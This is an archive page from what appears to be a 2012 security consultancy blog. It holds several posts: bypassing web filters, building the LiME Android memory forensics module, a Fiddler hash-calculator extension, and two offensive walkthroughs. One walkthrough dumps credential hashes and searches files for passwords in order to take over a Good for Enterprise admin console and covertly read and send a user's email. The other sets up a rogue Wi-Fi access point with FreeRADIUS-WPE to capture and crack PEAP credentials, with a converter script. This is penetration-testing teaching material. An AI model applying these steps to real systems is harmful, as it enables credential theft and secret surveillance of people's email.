Tuesday, April 24, 2012

Circumventing Internet Censorship

By Kunjan Shah.

During my first engagement at Foundstone I tested a web filtering software and we found several ways of bypassing it. With the recent news around SOPA and the controversy around Indian government willing to pre-screen Internet, I thought this might be the right time to write a blog on it. In this blog I have mentioned a few such techniques that can be used to circumvent web filtering software. Although a lot of this information is available on the internet (scattered), I have tried to put together a one-stop list of tried and tested techniques with detailed examples.

The discussion in this blog is limited to tricks and techniques that can be used on the web, and it does not focus on software that can be used for circumvention such as Application tunneling software, Re-routing systems, peer-to-peer software etc. The reason is most of the time users trying to circumvent corporate web filtering do not have administrator privileges to install these tools. If you already have administrator access to your machine then there are easier ways to bypass circumvention than the techniques described below. Some of the widely used tools include Peacefire, TOR, JAP ANON etc. You can find a thorough list of such tools here:

You can also obtain information on what its Censorship and its History here. I will not be covering that in this blog. Circumvention may be considered illegal in some companies/countries and if caught it may result in you getting fired or jailed thus, this blog is only for informational purpose and not an invitation to attempt this.

URL Canonicalization


In this technique we will use alternate domain names and alternative representations of the domain names to bypass filtering. For the purpose of this discussion let’s assume that access to www.facebook.com is blocked and our end goal is to access it from behind the web filtering tool. Depending on how intelligent the filtering tool is one or more of the below mentioned techniques should work. During our assessment we found that some of these techniques worked on the top filtering brands.

Alternative Domains


Instead of http://www.facebook.com you can try the following.
  1. https://www.facebook.com/ (Sometimes HTTPs version of the site is not blocked)
  2. http://Facebook.com
  3. http://Facebook.com/
  4. http://Facebook.com.
  5. http://Login.facebook.com
  6. http://touch.facebook.com
  7. http://M.facebook.com (Access the mobile version of Facebook instead)
  8. http://Apps.facebook.com
  9. http://Register.facebook.com


Alternate Representations


All the browsers do not equally accept the formats mentioned below. However, most of these work with the standard browsers. During our assessment we found that the URL and IP address of the website were blocked. However, when accessing the blocked website using the decimal and octal form it worked fine for us.
  1. Try accessing Facebook using the IP address: http://66.220.147.44
  2. Decimal format of the IP address 66.220.147.44 : http://1121751852
  3. Hexadecimal format of the IP address: http://0xd42dc932c/
  4. Dotted Hexadecimal form: http://0x42.0xdc.0x93.0x2c
  5. Dotted Octal form: http://0102.0334.0223.0054

Below is the list of tools for converting the IP address into different forms:

Translation Services


Translation services such as www.microsofttranslator.com can also be used to circumvent filters. We can do this by translating the blocked website e.g. boingboing.net from English to English. When doing so translation services work similarly to the web proxy sites. During our assessment we found that filtering tools block some common translation sites such as Babelfish. However, we were able to find one that was not blocked (InterTran) and access the blocked website boingboing.net


Some translation services such as translate.google.com prevent translation into the same language, so they may not be very useful depending on your needs. However, there is also a solution to this problem. You can use Google translate to convert a website from English to French and then back to English using the Google chrome’s translation features. Babelfish lets you translate from English to English by selecting “French to English” or any such option that ends in “to English”. Since, there is nothing to translate it just returns back the content in English.


List of other free translation services:


Cached Pages and Mirror Sites


Search engines keep copies of the indexed pages known as Cached pages. Cached pages of the blocked sites can be accessed through special keywords in the search request. During our review we noticed that www.boingboing.net was blocked by the filtering tool. However we could access its cached version through Google cache by searching for “cache:www.boingboing.net”.


We also noticed that we were able to access it by appending “nyud.net:8090” at the end such as www.boingboing.net.nyud.net:8090. URL’s with nyud.net as the domain name are processed by the Coral Content Distribution Network (CCDN). “CCDN is a free peer-peer content distribution network, comprised of a world-wide network of web proxies and name servers.” (http://www.coralcdn.org/)


Moreover old archived pages of the blocked sites can be obtained from www.archive.org or www.bibalex.org.



Low-Bandwidth Simulators


Low-bandwidth simulators such as www.loband.org let us simulate website performance on low bandwidths. This can act as a wrapper allowing us access to the text only version of the blocked sites. This is a good option to access news, blogs, email and other sites, however not a good option for accessing sites with Flash and HTML5 such as YouTube.



Proxy Websites


Proxy website is the easiest and well known way of accessing banned websites. However, the issue is that web filtering systems block most known proxy websites and continue to update their list on a regular basis. But the good news is that proxy sites keep on growing at a faster rate than they are banned. Thus, you will always find some such sites that are not banned. You can obtain a list of regularly updated proxy servers here. You can also join a proxy mailing list like Circumventor. If you are using proxy servers to access banned sites such as Facebook, be cautious about the information you provide such as credentials. A lot of this information may be cached on the proxy servers and get leaked or misused by the admins.



Web to email


It is possible to obtain blocked web pages and search the web for information via email by sending simple commands [FTP] . Here is the list of some popular sites:

A complete list of all such sites and commands can be found here. To obtain a blocked web pages in email send an email to www@web2mail.com with the address of the website as the subject.




In addition to this, you can also subscribe to receive daily updates of a website in email. This is a good method for obtaining information from blocked news and blog sites. There are other websites that provide similar services such as www.changedetection.com and www.watchthatpage.com. Every time a web page changes an email alert is sent to the user.



Web to PDF


Similarly you can also convert web pages to PDFs and download them or email them without getting blocked. None of the web filtering software that we tested caught this.


Websites providing free web to PDF conversion services:


RSS Aggregators


RSS Aggregators are websites or desktop applications that let you subscribe to and read RSS (Really Simple Syndication) Feeds. During our review we found that the filtering software did not block access to RSS aggregators such as Google Reader, Bloglines and Fastladder etc. This makes it possible for the user to read blogs from the restricted web sites like BoingBoing by pointing such RSS readers to listen to the RSS feeds. However, this technique is limited to sites that publish RSS feeds.



Google Add-ons


During our assessment we noticed that it was possible to access some of the blocked sites via Google gadgets. Just add gadgets for the blocked sites such as Facebook, Twitter and YouTube etc. to iGoogle and access the blocked content. Some smart web filtering systems may prevent one or more such gadgets, but not all of them. Similarly you can also use Yahoo widgets.



Non-Standard Web Browsers


Another technique is to use non-standard browsers for accessing blocked sites. Some examples include:

Accessing Blocked Instant Messengers


There are several free websites that let you access blocked instant messengers online over the web. Here is a list of few such sites:


Enjoy!

Monday, April 23, 2012

Acquiring volatile memory from Android based devices with LiME Forensics, Part I

By Ismael Valenzuela.

Up until now, most of the Android forensics research has been focused on areas like the acquisition and analysis of the internal flash NAND memory, SD Cards, understanding the YAFFS2 file system and scrutinizing APK files for malware analysis, among others.

However, little has been written about memory acquisition and analysis of Android devices, one of the most active areas of research in the field of computer forensics. Volatile memory, also referred as RAM, is a critical piece of evidence for every forensic investigator since it contains a wealth of information that is gone as soon as the device is rebooted or turned off (at the end of the day that’s why it’s called volatile, huh).

Several methods allow the extraction of information of running processes in Android. In example, the analyst could use the Android Debug Bridge (adb) to access a shell on the device and run the following commands to dump information about running processes, network connections and other device logs:

<WARNING>
The following examples assume you have installed the Android SDK and other prerequisites as described later in this post. I also assume that you are familiar with the basic operation of these tools and that at least you know how to create and manage an Android Virtual Device and access it using adb.



$ adb shell ps  
$ adb shell netstat  
$ adb shell logcat  


Figure 1 – Listing running processes on the Android emulator via adb


An alternative method for dumping the contents of memory of a running process involves using the Dalvik Debugging Monitor Server (ddms), a tool that comes with the Android SDK. All you need to do is to select a process and click on the “DUMP HPROF file” button to dump the contents of that process onto disk.


Figure 2 – Dumping the contents of the com.android.email process via ddms

However, none of the methods described above can dump the ‘full contents’ of memory. While they allow you to perform some “live analysis”, it wasn’t possible to obtain a full capture of the device’s RAM in the same fashion that it was possible in Linux with tools like fmem. At least, not until DMD came up.

So it was certainly a glad surprise to read about DMD (now called LiME Forensics) when preparing for my talk at the 1st International Symposium for Android Security held in Malaga last week. If you read Spanish you can find the slides for my talk “Latest Advances in Android Forensicshere.

This tool was first presented by his author, Joe Sylve, earlier this year at Shmoocon 2012 in Washington DC, and it’s the first tool that allows the analyst to capture full contents of RAM from Android devices.

While the tool was announced this week, it was effectively available from google code for almost a month, which allowed me to play with it and demo it for my audience last week. As I mentioned during my talk, the installation of the tool can get ‘tricky’ so I thought I’d better share with you the steps I took to compile it and how to use it.

The first and foremost thing to know before diving into the instructions is that LiME Forensics is a Loadable Kernel Module (LKM), and as such it has to be compiled for the specific kernel of your Android device.

Therefore, in the rest of the post, I will show how you can build a kernel of your own, how to load it onto the emulator and how to cross-compile the LiME LKM so you can test it with your customized kernel.

Though you can find the author’s original installation document here, I found that the instructions didn’t work with the latest versions of the SDK and NDK. Hence, the reason for this post. I hope the following instructions will save you some headaches, severe pain and some valuable time. And if they don’t work for you for some reason, leave a comment, so we can all learn ;)

I have to say that I also exchanged a couple of emails with Joe Sylve trying to figure out what was wrong and I have to say he was very responsive (thanks!).

GETTING READY TO ROCK


The following instructions have been tested successfully on Ubuntu 11.10, with Java SE Development Kit 6 Update 31, the Android SDK r18, NDK r7c and with the emulator running an Android Viritual Device (avd) based on Android 4.0.3 (API 15).

We will start downloading and unzipping the toolchain required to build the Android kernel. Download and untar the following:
You can place them anywhere, but take note of that since you will need to include those directories in your path, as shown later in this post.

To follow the example, I placed mine in the following directories, hanging off my home folder:

~/android-sdk-linux
~/android-ndk-r7c

Next we will get the source code for the Android SDK and other tools to compile those.

There is no need to duplicate what is well documented in the Android Source website, so just follow the instructions of how to setup a Linux build environment that can be found here: http://source.android.com/source/initializing.html

Once you’ve installed all the required packages, including the Java Development Kit, you should install the repo client, as described here: http://source.android.com/source/downloading.html

You must initialize the repo client now. To do so, create an empty directory to hold your files and run repo init from there:

 $ repo init -u https://android.googlesource.com/platform/manifest

This allows your client to access the android source repository, downloading the latest version of Repo with all its most recent bug fixes.

Now pull down the files to your working directory running:

$ repo sync

You must initialize the environment now:

$ source build/envsetup.sh

And choose a target to build with lunch. I selected the default one:

 $ lunch full-eng

BUILDING THE CUSTOM ANDROID KERNEL


You will need to download and untar the kernel source for your device. If you are dealing with a real device go to the website of your device manufacturer. For our test we will use the “goldfish” source code only. Goldfish is the name of the kernel branch for the Android emulator.

$ git clone https://android.googlesource.com/kernel/goldfish.git ~/source/kernel/goldfish/goldfish

Now you have the emulator kernel source inside the ~/source/kernel/goldfish/ directory. Change to the goldfish directory and make sure all the tools and the cross-compilation toolchain is in your path. Below is an excerpt of my .bashrc file with the aliases I defined for this purpose:

export USE_CCACHE=1

export PATH=$PATH:~/android-sdk-linux/tools/
export PATH=$PATH:~/android-sdk-linux/platform-tools/
export ANDROID_SWT=~/android-sdk-linux/tools/lib/x86_64/
export ANDROID_JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export CCOMPILER=~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-

Note that the location of these tools (JDK, NDK, etc…) might vary depending on where you placed them in the previous steps.

Before we try compiling the kernel for the emulator we need to get a .config file for the kernel. In order to do that you must retrieve and copy the kernel config from your device. While your device is running and accessible via the Android Debug Bridge, run:

$ cd ~/android-sdk-linux/platform-tools    
$ ./adb pull /proc/config.gz
$ gunzip ./config.gz
$ cp config ~/source/kernel/goldfish/.config

An alternative to this last step would be to run make ARCH=arm goldfish_defconfig from the goldfish kernel source directory.


The next two steps are critical for the success of this exercise, as we will be preparing the kernel source for our module.

First, make sure that the following options are enabled in the kernel config. Check that the .config file contains:

CONFIG_MODULES=y
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y

Otherwise add those lines. These options have to be enabled for the kernel to be able to load and unload modules.

Second, build the kernel using the following command:

$ make ARCH=arm CROSS_COMPILE=$CCOMPILER EXTRA_CFLAGS=-fno-pic modules_prepare

Note that we are using the cross-compilation toolchain provided by the Android NDK with the option CROSS_COMPILE. Obviously, the CCOMPILER variable must be correctly set (see the excerpt of my .bashrc file above). Note that I also had to add the EXTRA_CFLAGS=-fno-pic for make to work with the latest NDK. This is not included in the LiME documentation, but it worked for me.

Your new kernel is now located at arch/arm/boot/zImage

You can now run your brand new kernel using the emulator included with the Android SDK:

$ emulator -avd Demo -kernel ~/source/kernel/goldfish/arch/arm/boot/zImage  -show-kernel –verbose

In this case, Demo is my Android Virtual Device (AVD) which I previously created using the AVD manager. It’s running API 15 (Android 4.0.3).

OBTAINING AND COMPILING LIME


Grab a copy of LiME from here:
http://code.google.com/p/lime-forensics

All you need is lime.c and a Makefile that will prepare the module for cross-compilation.

A sample Makefile is shipped with the LiME source, but I will copy below the one that I created for this purpose:

obj-m := lime.o

KDIR_GOLD := ~/source/kernel/goldfish/

KVER := $(shell uname -r)

PWD := $(shell pwd)
CCPATH := ~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin

default:
 # cross-compile for Android emulator 
 $(MAKE) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- EXTRA_CFLAGS=-fno-pic -C $(KDIR_GOLD) M=$(PWD) modules
 mv lime.ko lime-goldfish.ko
 
 # compile for local system
 $(MAKE) -C /lib/modules/$(KVER)/build M=$(PWD) modules
 mv lime.ko lime-$(KVER).ko
 
 make tidy

tidy:
 rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
 rm -rf \.tmp_versions

clean:
 make tidy
 rm -f *.ko

Save and place this Makefile in the directory where you’ve placed the source for LiME. Again, make sure the location of the directories included above corresponds with your install.

Finally (at last!) you are ready to cross-compile the kernel module.

From the directory where you’ve placed lime.c and the Makefile, run:

$ make

If everything went well, you should have a LKM file called lime-goldfish.ko and you deserve a short break with a good cup of before moving on.

In the second part of this post we will look at how to use this Loadable Kernel Module to dump the full contents of RAM of an Android device and what kind of information can be retrieved from this capture.

About the Author


Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

Tuesday, April 17, 2012

Hack Tips: Good for Enterprise Exploitation

By Tony Lee.

Good’s website best describes their excellent product capabilities:

“Good for Enterprise™ is a suite of powerful mobile device management tools that bring military-grade security, end-to-end data loss prevention, and collaboration features to today's most popular smartphones and tablets — without compromising IT security and control.”
Source: http://www.good.com/products/good-for-enterprise.php

What we are discussing here is not an 0day against Good for Enterprise, but it is a methodology that can be used to inspect the security of the Good for Enterprise environment.

Overview

Overall, the process involves the following steps:

  1. Identifying the Good Enterprise Server
  2. Determine the Good Administrator
  3. Obtaining Good Administrator Credentials
  4. Accessing the Management Interface (Good Mobile Control)
  5. Provisioning devices and reading other’s email (Note: We are not lawyers--this might be a bad idea)

Identifying "Good for Enterprise" Servers

How to find or determine if you are sitting on a “Good for Enterprise” server (we found it based on DNS name and confirmed it with the following methods):

  1. Host naming scheme examples
    • \\GOOD
    • \\GOODMAIL
  2. Application directory
    • C:\Program Files (x86)\Good Technology\
  3. User accounts - Although there a no specific names for the service, the documentation uses "GoodAdmin", so perhaps some possible names would be:
    • Goodgmc
    • GoodAdmin
  4. Services - net start should contain:
    • Good Mobile Control server
    • GoodLink Server

Identifying "Good for Enterprise" Administrators

Try to determine the Good Administrators (We found a Good related file and viewed the properties to see who had rights on the file)

  1. Check for user accounts -
    • Net commands - net user
    • Check "Users" directory - C:\>dir c:\users
      Volume in drive C is OS
      Volume Serial Number is

      Directory of c:\users

      11/10/2011 08:10 AM <DIR> .
      11/10/2011 08:10 AM <DIR> ..
      12/02/2010 09:02 AM <DIR> <username>
      09/01/2011 10:08 AM <DIR> <username>
      07/13/2009 11:57 PM <DIR> Public
      05/19/2011 01:43 PM <DIR> Administrator
      11/07/2011 03:26 PM <DIR> Goodadmin
      09/21/2011 04:02 AM <DIR> GoodGMC
      0 File(s) 0 bytes
      8 Dir(s) 23,495,675,904 bytes free

  2. File permissions of Application Files
    • Right click file -> Properities -> Security Tab

Identifying "Good for Enterprise" Account Credentials

We used Windows Credential Editor to grab hashes from memory for a Good Administrator and cracked them

  1. With the Good Administrator account identified, dump password hashses
    • hashdump
    • gsecdump
    • fgdump
    • Other favorites
  2. Find files that may contain credentials
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*
  3. Windows Credential Editor to target Domain accounts- :
    • C:\> wce.exe
      WCE v1.2 (X64) (Windows Credentials Editor) - (c) 2010,2011 Amplia Security – by Hernan Ochoa (hernan@ampliasecurity.com)
      Use -h for help.

      User: Domain:00000000000000000000000000000000:B9BLAHBLAHBLAHBLAHBLAHBLAHBAC
      GoodGMC: Domain:00000000000000000000000000000000:7D3BLAHBLAHBLAHBLAHBLAHBLAHFA3
      User:Domain:AC5BLAHBLAHBLAHBLAHBLAHBLAHDA2:34537B9BLAHBLAHBLAHBLAHBLAHBLAH708A
      BINGO! LM Hash (has rights on the Good file)
      GoodAdmin:Domain:00000000000000000000000000000000:585BLAHBLAHBLAHBLAHBLAHBLAH3A
      Account called GoodAdmin, would have to replay this hash - a possibility

Accessing The Management Interface (Good Mobile Control)

To identify if the HTTP interface is running

Via the command line:
C:\ >netstat -ano | findstr 8443
TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 3804
TCP [::]:8443 [::]:0 LISTENING 3804


Via the Browser:
  • http://<GoodServer> redirects to secure login over 8443 at the URL below
  • https://<GoodServer>:8443/login.do


Sample of the Good Mobile Control Interface - Source: http://www.c-cure.dk/Images/Producenter/Good/GoodMobileControl.PNG

Covertly Reading Emails

Once logged into the Good Mobile Control interface, you have full power to lock, remotely wipe, and configure new handhelds.

You are not able to generate a new Over-The-Air (OTA) code for a current account as you should receive the following error when trying to do so:

“This email address has already been set up on another handheld. Contact your IT administrator” -I hate those error messages—especially if we are the IT administrator. Doh!

However, you can add a handheld to an already existing user to read their email.

Reading email without the user's knowledge

Check the policy that that you are about to create your user under to ensure that a welcome email does not get emailed to the user:

Log into Good Mobile Control web interface -> Policies tab -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

If it is checked, create a copy of the policy and uncheck that welcome email setting:

Log into Good Mobile Control web interface -> Policies tab -> Check the policy you want to copy and click the button that says “Make Copy”. Now, click on the policy hyperlink -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

Provisioning a new handheld to read user email


  1. Handhelds tab -> “Add Handhelds” button -> Search for a User -> Click “Look Now” -> Select the Policy and Messaging server then Click “Add”
  2. Under the handhelds tab you will have a blank entry with just a name. Click the hyperlink for the person
  3. Click on the OTA link on the left and the OTA pin displayed is valid
  4. Download the Good application from the market the enter the email address of the victim and the OTA pin displayed on the Good Mobile Control page.
  5. Read and “mark as unread” to your heart’s content. You can even send emails as this person, however be sure to delete the email from the sent folder—you may want to have them reply to you on your “personal” email address at victimsname@gmail.com for further correspondence :0 ;)

Are you sure you are the only one reading your email?

Tuesday, April 10, 2012

Capturing and cracking a PEAP challenge/response with FreeRADIUS-WPE

By Robert Portvliet.

I figured I would put together a quick post on configuring and using FreeRADIUS-WPE, as lately I’ve seen a few people have issues getting it going on Backtrack 5 R2. To perform a successful attack we’re going to need a couple items, which are the updated FreeRADIUS-WPE package Brad Antoniewicz put together a few months back, and hostapd for our malicious AP. We’re also going to need to put together a .conf file for hostapd to run from.

After booting into Backtrack, go to http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html, and download freeradius-server-wpe_2.1.11-1_i386.deb.

To install, type:
dpkg --install freeradius-server-wpe_2.1.11-1_i386.deb
Then:
ldconfig
Next install hostapd:
apt-get install hostapd

Run the FreeRADIUS-WPE setup from the Backtrack menu, which runs the following:

sh -c "cd /pentest/libs/freeradius-wpe/raddb/certs && ./bootstrap && cp -r * /usr/local/etc/raddb/certs;sudo -s"

The output should finish up looking something like this:


Then, we test that FreeRADIUS is working by:

radiusd -X 

("-X" turns on full debugging). It will scroll a bunch of information on the screen, and should end up with the following:


Next, we need a configuration file for hostapd to run from. Here is one Brad Antoniewicz put together a while ago:

interface=wlan0
driver=nl80211
ssid="corporateWIFI"
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
channel=1
wpa_pairwise=TKIP CCMP

Start a monitor mode interface with:

airmon-ng start wlan0

(or in my case wlan1), which will give you the mon0 monitor mode interface.


Next start hostapd and specify the configuration file:


Now that we have hostapd and FreeRADIUS-WPE running, connect to the “corporateWIFI” SSID with your test client and input your credentials. You should see activity in your hostapd window at this point, which will look something like this:


Your client will tell you the login failed (obviously), but if all goes well, when you tail the FreeRADIUS-WPE log, located at /usr/local/var/log/radius/freeradius-server-wpe.log, you’ll see the username, challenge, and response:


Finally, we can use asleap to attempt to crack the challenge/response.


Obviously, you are limited strictly to the words in your wordlist when using asleap, but if you want you can feed the challenge/response to John and use its mangling capabilities. Josh Kelley created a neat Python script called radiusWPE2john.py, which I happened upon on pastebin (http://pastebin.com/RJwgbwNh) that takes the FreeRADIUS-WPE log output and converts the challenge/response into a format that John can understand. Here's a copy of it:

#!/usr/bin/python

############################################################################### 
# Free Radius WPE log file convertor to John The Ripper formatted file for 
# password cracking.  Use the following format for John:
# ./john --format=NETNTLM freeradius.john
#
# 12/19/2011 - Josh Kelley
###############################################################################

import sys

if len(sys.argv) < 2:
 print "Please feed me the path to the Free Radius WPE log file"
 exit()

fileIn = open(sys.argv[1],'r')
fileOut = open('freeradius.john','w')

i = 0
for line in fileIn:
 lineClean = line.strip()
 lineSplit = lineClean.split(':')
 if lineSplit[0] == "mschap":
  i = i + 1
 if lineSplit[0] == "username":
  username = lineSplit[1].strip()
  i = i + 1
 if lineSplit[0] == "challenge":
  challenge = ""
  for x in lineSplit[1:]:
   challenge = challenge + x
  challenge = challenge.strip()
  i = i + 1
 if lineSplit[0] == "response":
  response = ""
  for x in lineSplit[1:]:  
   response = response + x
  response = response.strip()
  i = i + 1
 if i == 4:
  lineNew = "%s:$NETNTLM$%s$%s" % (username, challenge, response) 
  fileOut.write("%s\n" % lineNew.strip('\n'))
  i = 0
fileIn.close()
fileOut.close()

Run radiusWPE2john.py and point it to the FreeRADIUS-WPE log. It will generate the freeradius.john file with the challenge/ response converted to the proper formatting for John.


Then, simply feed John the freeradius.john file. The comments in RadiusWPE2John give the example of using the argument --format=NETNTLM, but John doesn’t seem to find the hashes when given it. It does find them when using no argument though. (YMMV)


Of course, you can also just pipe the output from John into asleap, as shown below. Make sure to include the dash after the –W switch for asleap. That makes the magic happen. Incidentally, you can do the same thing with CoWPAtty and Aircrack, in both cases putting a dash after the wordlist (-w) parameter let’s you take stdout from John to perform wordlist mangling.


Enjoy!

Tuesday, April 3, 2012

Introducing Foundstone Hash Calculator, A Fiddler Extension

By Neelay S Shah.

Over the last few months on web application penetration tests, I've come across scenarios where I would need to create a hash for whatever reason. Unfortunately, Fiddler does not have a built-in hash calculator and I couldn't find an already existing Fiddler extension that would do this. I'm a big fan of Fiddler, but I would have to use another proxy like Paros, Web Scarab or Burp just to calculating a hash. So, I wrote this extension that adds the capability to create hashes (MD5, SHA-1, SHA 256, SHA 384 and SHA 512) from within Fiddler itself.

Downloading the Extension

You can download the extension installer from here:

Installation Notes / Pre-Requisites

The extension has the following pre-requisites:
  • .NET framework version 2 or higher - If you already have a working installation of Fiddler on your machine then you already have .NET framework version 2 or higher installed.
  • Fiddler version 2.3.5.0 or later
The installation does NOT need administrative privileges. The extension installs the appropriate assemblies to the following path -
  • C:\Users\\Documents\Fiddler2\Scripts – Windows 7
  • C:\Documents and Settings\\My Documents\Fiddler2\Scripts – Windows XP, 2003 Server

Once installed, the extension can be un-installed from the standard Windows “Add/Remove Programs” snap-in.

Usage Notes

Once installed, the extension can be invoked by launching Fiddler. The tool menu item “Tools -> Hash Calculator” launches the extension. The following screenshots indicate the same:


Invoking Hash Calculator



Hash Calculator in action